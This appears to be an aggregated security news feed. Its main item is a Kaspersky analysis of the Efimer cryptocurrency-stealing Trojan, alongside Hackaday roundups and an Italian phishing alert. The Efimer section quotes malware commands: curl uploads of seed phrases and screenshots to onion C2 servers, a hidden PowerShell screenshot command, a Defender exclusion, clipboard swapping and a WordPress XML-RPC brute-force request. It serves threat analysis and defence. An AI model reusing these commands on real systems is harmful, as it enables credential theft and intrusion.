The Internet is fighting over whether robots.txt applies to AI agents. It all started when Cloudflare published a blog post, detailing what the company was seeing from Perplexity crawlers. Of course, automated web crawling is part of how the modern Internet works, and almost immediately after the first web crawler was written, one managed to DoS (Denial of Service) a web site back in 1994. And the robots.txt file was first designed.

Make no mistake, robots.txt on its own is nothing more than a polite request for someone else on the Internet to not index your site. The more aggressive approach is to add rules to a Web Application Firewall (WAF) that detects and blocks a web crawler based on the user-agent string and source IP address. Cloudflare makes the case that Perplexity is not only intentionally ignoring robots.txt, but also actively disguising their webcrawling traffic by using IP addresses outside their normal range for these requests.

This isn’t the first time Perplexity has landed in hot water over their web scraping, AI learning endeavors. But Perplexity has published a blog post, explaining that this is different!

And there’s genuinely an interesting argument to be made,that robots.txt is aimed at indexing and AI training traffic, and that agentic AI requests are a different category. Put simply, perplexity bots ignore robots.txt when a live user asks them to. Is that bad behavior, or what we should expect? This question will have to be settled as AI agents become more common.

Breaking Into the Vault

Researchers at Cisco Talos took a look at the Dell ControlVault, a Hardware Security Module (HSM) built into many Dell laptops. The firmware running on these embedded processors had some problems, including a stack-overflow and other memory-related issues. Usually the potential for abuse of these kind of attacks is limited mostly to the theoretical realm, but this embedded HSM also includes accessible USB pins, that can be accessed with a custom connector. The vulnerabilities found, then represent a real attack scenario where the firmware on the HSM can be tampered with, via nothing more than physical access. To prove the point, the Talos write-up includes a great video of a compromised machine accepting a green onion as a valid fingerprint for Windows Login.

Trend Micro In the Wild

Trend Micro’s Apex One system is under active exploitation, as a pair of vulnerabilities allow an authenticated attacker to inject system commands in the system’s management console. The full fix is expected to roll out later this month, but a mitigation disables a specific feature of the console, the Remote Install Agent. This leads to the obvious conclusion that the installation process was allowing for code execution as part of the install process.

GreedyBear

There was an interesting malware campaign run this year, by a group that Koi Security is calling GreedyBear. The campaign could be called a blitz, where malicious browser extensions, ransomware binaries, and scammy websites were all employed at once, with the goal of stealing cryptocurrency. The surprising thing is that so far not much over $1 million has been reported as stolen through the campaign.

The first technique used was “Extension Hollowing”, where safe, boring browser extensions are published, and maintained for a few months. Good reviews come in naturally or are purchased, and the publisher appears trustworthy. Then the extension is updated, with malicious code suddenly shipping. These extensions are now sniffing for user input and form filled data.

The second technique used was the old classic, packing malware into cracked and pirated software. The source of many of these malicious binaries seems to be primarily Russian piracy sites.

The final approach discovered was the simple scam website, often typo-squatting on nearly-legitimate domain names. These sites advertised fake hardware wallets or wallet repair, but only existed to steal whatever information would-be customers were willing to share.

The question may be raised, why does Koi Security believe all this activity is connected? The answer boils down to a single IP address, 185.208.156.66. This was the Command and Control server for the entire network of activity, and should be seen as a definite red flag in logs and records.

HashiCorp Vault Audit

The fine folks at Cyata took a crack at HashiCorp’s Vault, a source available secrets storage solution. And they discovered a host of subtle but important issues. The first on the list is an outstanding find, and it deals with how Vault protects against brute-force attacks. It’s supposed to be a simple counter, that locks out password attempts for a while, once a threshold of failures has been reached. The problem is that usernames aren’t case sensitive, but the failure counter is case sensitive in tracking password failures. Tried guessing the admin password too many times? Try the Admin account next.

The Multi-Factor Authentication has some issues, like the TOTP code reuse protection. This attempts to enforce that a code is only used once while valid. The problem is that a code of “ 123456” and “123456” both evaluate the same for the TOTP valuation itself, but as different codes for the reuse protection. This could enable an attacker to first abuse the reuse protection error message to identify a valid but used code, and then insert the space to be able to use the code for authentication.

After authentication, this same style of attack is possible again, this time targeting the root policy protections. An admin cannot assign this “root” policy, but can assign a “ root” policy. Those are treated as different policy identifiers by the validation code, but the same thing in the final implementation.

And finally, they discovered a Remote Code Execution flaw, via plugin installation. This one requires admin access, but an information leak and an audit log that allows writing to anywhere on the disk is enough to execute code injected in that audit log. This seems to be the first RCE ever made public in Vault, which is an impressive statement for both Hashicorp and Cyata.

Bits and Bytes

Nvidia isn’t taking last week’s talk of backdoors laying down, taking the offensive this week to reassure everyone that “There are no back doors in NVIDIA chips.” There’s a separate bit of news that US lawmakers are considering legislation that would require a kill-switch and location verification in future hardware.

It’s reassuring to be reminded that cyber-criminals do get captured and extradited. A Nigerian man was arrested in France and is being extradited to the US on multiple charges of fraud, identity theft, and other crimes. No word on whether the Nigerian national was or has claimed to be a prince.

And finally, filed in the “awkward” category, Google has disclosed that they were also a victim in the Salesforce hacks that Google researchers discovered and first publicized. These were good-old social engineering campaigns, where the attacker contacted an employee at the target company, and convinces them to read off an eight-digit security code. A group calling itself ShinyHunters has started an exploitation campaign using data pilfered in the attacks.

hackaday.com/2025/08/08/this-w…

The Texas Instruments TP4056 is the default charge-controller chip for any maker or hacker working with lithium batteries. And why not? You can get perfectly-functional knockoffs on handy breakout boards from the usual online sources for pennies. Betteridge’s Law aside, [Lefty Maker] thinks that it may well be time to move on from the TP4056 and spends his latest video telling us why, along with promoting an alternative.

His part of choice is another TI chip, the BQ25185. [Lefty] put together his own charge controller board to show off the capabilities of this chip — including variable under- and over-charge protection voltages. Much of his beef with the TP4056 has less to do with that chip than with the cheap charge modules it comes on: when he crows about the lack of mounting holes and proper USB-PD on the knock-off modules, it occurs to us he could have had those features on his board even if he’d used a TP4056.

On the other hand, the flexibility offered by the BQ25185 is great to future-proof projects in case the dominant battery chemistry changes, or you just change your mind about what sort of battery you want to use. Sure, you’d need to swap a few resistors to set new trigger voltages and charging current, but that beats starting from scratch.

[Lefty Maker] also points out some of the advantages to making your own boards rather than relying on cheap modules. Namely, you can make them however you want. From a longer USB port to indicator LEDs and a built-in battery compartment, this charging board is exactly what [Lefty Maker] wants. Given how cheap custom PCBs are these days, it’s not hard to justify rolling your own.

The same cannot be said of genuine TI silicon, however. While the BQ25185 has a few good features that [Lefty Maker] points out in the video, we’re not sure the added price is worth it. Sure, it’s only a couple bucks, but that’s more than a 300% increase!

We’ve seen other projects pushing alternative charge controllers, but for now the TP4056 reigns as the easy option.

youtube.com/embed/8npqPz5fvnI?…

hackaday.com/2025/08/08/is-it-…

Introduction

In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.

Report summary:

• Efimer is spreading through compromised WordPress sites, malicious torrents, and email.
• It communicates with its command-and-control server via the Tor network.
• Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns.

Kaspersky products classify this threat with the following detection verdicts:

• HEUR:Trojan-Dropper.Script.Efimer
• HEUR:Trojan-Banker.Script.Efimer
• HEUR:Trojan.Script.Efimer
• HEUR:Trojan-Spy.Script.Efimer.gen

Technical details

Background

In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed “Efimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.

Part of the script with comments

Email distribution

The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained “details” about the alleged infringement and the proposed buyout amount.

Sample email

In a recent phishing attempt, targets received an email with a ZIP attachment named “Demand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named “PASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase “S”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.

Archive contents

If the user unzips the password-protected archive, they’ll find a malicious file named “Requirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message.

Error message

Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level:

• If the script is executed on behalf of a privileged user, it adds the C:\\Users\\Public\\controller folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\\Windows\\System32\\exe and C:\\Windows\\System32\\cmd.exe. Following this, the script saves two files to the aforementioned path: “controller.js” (containing the Efimer Trojan) and “controller.xml”. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml.

• If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility.

Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.

Efimer Trojan

The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server.

The Trojan starts by using WMI to check if Task Manager is running.

If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server.

The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:

The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates.

Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.

The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.

The script then tries to load a file named “SEED” from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.

At this point, the controller concludes its initialization process and enters its main operation cycle.

The main loop

In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.

If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timer variable).

As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timer decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.

The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php

The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile.
curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile
After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named “cfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.

Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses.

First, it scans the clipboard for strings that look like mnemonic (seed) phrases.

If it finds any, these phrases are saved to a file named “SEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.

They are captured with the help of the following PowerShell command:
powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();"
The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.

Screenshots are sent to the following path on the server:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php
Files are also sent via a curl command:
curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '"
After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:

• Short Bitcoin wallet addresses (starting with “1” or “3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address.
• For long wallet addresses that start with “bc1q” or “bc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original.

• If a wallet address begins with “0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address.

• For Monero addresses that start with “4” or “8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with “4”.

This clipboard swap is typically executed with the help of the following command:
cmd.exe /c echo|set/p= + new_clipboard_data + |clip
After each swap, the script sends data to the server about both the original wallet and the replacement.

Distribution via compromised WordPress sites

As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.

Here’s an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/

The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a “readme !!!.txt” text file, and an executable that masquerades as a media player.

Downloaded files

To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\\Users\\Public\\Controller folder, but it’s named “ntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named “ntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the “Controller” folder to Windows Defender exclusions.
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\'
The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with “vt05”.

Additional scripts

On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.

WordPress site compromise

Among these additional scripts, we found a file named “btdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.

Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\\Users\\Public\\Controller\\.

The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the “B” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter “B”.

After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.

Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the “B” parameter, kicking off a brute-force attack.

The script’s operation cycle involves both the brute-force code and the handler for its core logic

The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.

The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.

After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.

Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.

Part of the getSeDomains function

The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named “UDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains.

For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this:
<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall>
When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.

This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.

Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the “B” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW.

The ObjGetW function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObj function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.

Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.

When attempting to guess a password for each user, a web page post request is sent via the WPTryPost function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.

After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.

Successfully guessed passwords are sent to the C2 with the GOOD command.

Alternative Efimer version

We also discovered another script named “assembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.

Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment.

If it detects a VM, it prefixes the GUID string with a “V”; otherwise, it uses an “R”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden.

After that, a file named “lptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the “lptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.

After that, the script attempts to read data from a file named “geip”, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe.

Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.

It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.

The script then reads a file named “data” from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at:
http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php
After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands:

• RPLY returns “OK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns “OK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established.
• EVAL executes a JavaScript script provided in the response.
• KILL completely removes all of the malware’s components and terminates its operation.

Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.

Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named “data”. After these steps, the entire cycle repeats.

“Liame” email address harvesting script

This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail.

At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.

Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.

Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.

The request includes the following parameters:

• LIAM: unique identifier
• action: request type
• data: data corresponding to the request type

In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.

If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message.

The request is sent to the following C2 address:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The server returns a JSON-like structure, which the next function later parses.

The structure dictates the commands the script should execute.

This script supports two primary functions:

• Get a list of email addresses from domains provided by the server
  

  The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.

  The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.

  

  The PageGetLiame function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated within mailto links .

  

  Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.

• Exfiltrate collected data to the server
  In this scenario, the script anticipates two parameters from the C2 server’s response: pstack and buffer, where:
  
  • pstack is an array of domains to which subsequent POST requests will be sent;
  • buffer is an array of strings, each containing data in the format of address,subject,message.

  The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.

  If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.

Throughout the code, you’ll frequently encounter the term “Liame”, which is simply “Email” spelled backwards. Similarly, variations like “Liama”, “Liam”, and “Liams” are also present, likely derived from “Liame”. This kind of “wordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named “PageGetEmail” function, you’d find “PageGetLiame”.

Victims

From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.

TOP 10 countries by the number of users who encountered Efimer (download)

Takeaways

The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.

Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.

It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.

For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.

Indicators of compromise

Hashes of malicious files
39fa36b9bfcf6fd4388eb586e2798d1a — Requirement.wsf
5ba59f9e6431017277db39ed5994d363 — controller.js
442ab067bf78067f5db5d515897db15c — xmpeg_player.exe
16057e720be5f29e5b02061520068101 — xmpeg_player.exe
627dc31da795b9ab4b8de8ee58fbf952 — ntdlg.js
0f5404aa252f28c61b08390d52b7a054 — btdlg.js
eb54c2ff2f62da5d2295ab96eb8d8843 — liame.js
100620a913f0e0a538b115dbace78589 — assembly.js
b405a61195aa82a37dc1cca0b0e7d6c1 — btdlg.js

Hashes of clean files involved in the attack
5d132fb6ec6fac12f01687f2c0375353 — ntdlg.exe (Tor)

Websites
hxxps://lovetahq[.]com/sinners-2025-torent-file/
hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip

C2 URLs
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion
hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion

securelist.com/efimer-trojan/1…

Although these days we get to tap into many sources of entropy to give a pretty good illusion of randomness, home computers back in the 1980s weren’t so lucky. Despite this, their random number generators were good enough for games and such, as demonstrated by the [CoCo Town] YouTube channel.

The CoCo is the nickname for the TRS-80 Color Computer, which despite its name, shares absolutely nothing with the TRS-80. Its BASIC version is called Color BASIC, which like many others was based on Microsoft BASIC, so the video’s description should be valid for many other BASIC versions as well. In the video we’re first taken through a basic summary of what the floating point format is all about, before running through an example of the algorithm used by Color BASIC for its RND function, using a test program written in Color BASIC.

As described in the video, the used algorithm appears to be the linear congruential generator, which is a pseudo-random generator that requires minimal resources from the hardware it runs on. Of course, its main disadvantage is that it will fairly rapidly begin to repeat itself, especially with a limited number of output bits. This makes it a decent choice even today for something like simple game logic where you just want to get some variation without aiming for cryptographically secure levels of randomness.

youtube.com/embed/XzXvcamBzOk?…

Thanks to [Stephen Walters] for the tip.

hackaday.com/2025/08/08/explor…

Nelle ultime ore è emersa una nuova campagna di phishing mirata contro l’Università degli Studi di Padova, che utilizza una pagina di accesso falsificata per carpire le credenziali di studenti e personale accademico. L’immagine mostra un sito che imita in modo piuttosto fedele il portale di Single Sign-On dell’ateneo, ma ospitato su un dominio sospetto (“hoster-test.ru”), elemento che dovrebbe subito insospettire l’utente attento.

Il layout e i loghi originali sono stati copiati per rendere la truffa più credibile, ma la barra dell’indirizzo e l’assenza di connessione sicura (indicata da “Non sicuro”) rivelano la natura malevola del sito.

L’allarme è stato diramato dal CERT-AgID, e questo attacco sembra ricalcare lo schema di un attacco precedente, con una pagina che replica fedelmente quella istituzionale e punta a sottrarre email e password in chiaro.

L’obiettivo dichiarato dagli esperti è evidente: ottenere accesso non autorizzato alle caselle di posta e ai sistemi interni dell’ateneo, sfruttando le credenziali compromesse per ulteriori attività malevole. La scelta di colpire studenti e personale universitario non è casuale: questi account possono contenere informazioni personali, dati di ricerca e accesso a sistemi sensibili. L’uso di domini esteri e poco affidabili è un chiaro indicatore della natura fraudolenta dell’operazione.

